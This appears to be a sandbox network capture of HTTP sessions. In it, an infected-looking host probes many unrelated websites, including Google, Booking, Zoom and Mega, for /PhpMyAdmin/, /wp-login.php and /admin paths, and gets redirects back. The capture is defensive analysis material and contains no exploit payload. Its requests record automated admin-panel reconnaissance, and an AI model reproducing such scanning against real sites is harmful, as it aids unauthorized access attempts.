                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.371448040 CET221OUTGET /admin?sub1=20240205-2216-10dd-af1c-3865e2a64b77 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww16.followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.582909107 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                511192.168.2.66536131.216.144.580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.372178078 CET168OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.572525978 CET195INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://mega.nz
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                512192.168.2.665343188.212.100.15480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.372421980 CET172OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zarkana2.ro
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.606343985 CET1030INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                content-length: 795
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:17:37 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                location: https://zarkana2.ro/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                513192.168.2.665389104.18.41.15380
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.373697042 CET172OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: app.plex.tv
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.515626907 CET311INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 17
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://app.plex.tv/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd63697f69fb-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Moved Permanently


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                514192.168.2.66537134.250.93.11280
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.374129057 CET168OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: kwyk.fr
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.575838089 CET409INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.kwyk.fr/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                515192.168.2.665370185.120.71.2480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.374212027 CET174OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: analvids.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.583933115 CET382INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: http://www.analvids.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                516192.168.2.665372138.66.39.20580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.375200987 CET184OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login2.innova.puglia.it
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.607443094 CET120INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://login2.innova.puglia.it/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                517192.168.2.6654193.161.150.6980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.387649059 CET180OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.489934921 CET580INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://account.booking.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 cf815e48514b90d59fa790be38ee8ffc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: RcTMoS-r4bNl0AASdMoC38HjSJamCuX8ZCG6LJVy1Tlolva8cogh_A==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                518192.168.2.66541844.199.96.17980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.400068045 CET180OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.520560980 CET399INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Location: https://pxndx-mcr.boletia.com/admin.php
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                519192.168.2.66534236.255.71.4580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.430507898 CET177OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: instructory.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.812014103 CET151INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:15 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://instructory.net/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                520192.168.2.665453142.250.105.8480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.466193914 CET180OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.589400053 CET485INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.589411020 CET184INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef a6 bd 96 18 48 6b ac 05 c5 22 39 b4 47 89 8b 11 8c 11 8d 05 ff be 31 ed b1 73 59 76 76 18 de d2 5c 96 05 8b 68 2e 78 ea 87 bc cb 42 b0 d2 be a1 45 12 cc 64 e7 66 ee 87 8d 92 ef
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHHk"9G1sYvv\h.xBEdf!T]n xJ{Hj@U!,(E`i VffX2|


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                521192.168.2.665452170.114.52.480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.478733063 CET170OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.638727903 CET1018INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://us04web.zoom.us/admin
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=qAyyVUMtN.VwwaJ3DSunEJzUejWU4vbQ3oi8vft7Zmk-1707131771-1-AUpaUHNP7XBH7VoYl7WtbTOFNZTDujAHBqvdFHtA2TvZkyao3SyXavbmho30yF0TtYC7avtf6LVm95z/tp5urOI=; path=/; expires=Mon, 05-Feb-24 11:46:11 GMT; domain=.us04web.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Uk4kAKmfQfxa5qBfpcBSiRF2ggTdoKpFC9bowkFHC%2BaQIK1W9q0HP1CFApncNCtEU2dbKHEpl5rknW1f64Ao5%2FiL1eRgwh6TJk%2FJ%2F%2B26yks2IjQL0WnN0hDkQvVt0yLb9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd641b0244df-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                522192.168.2.66548344.195.133.14580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.479032993 CET177OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.594872952 CET580INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-control: no-cache="set-cookie"
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://ucv.blackboard.com/admin.php
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74419178944AAED0016459F27E1FD7932EE08EBDD9B7BE8AFE3F88D069A772BAB632F18933680BD0BFD5F16AEC6C3BF27FF;PATH=/;MAX-AGE=900
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 175
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
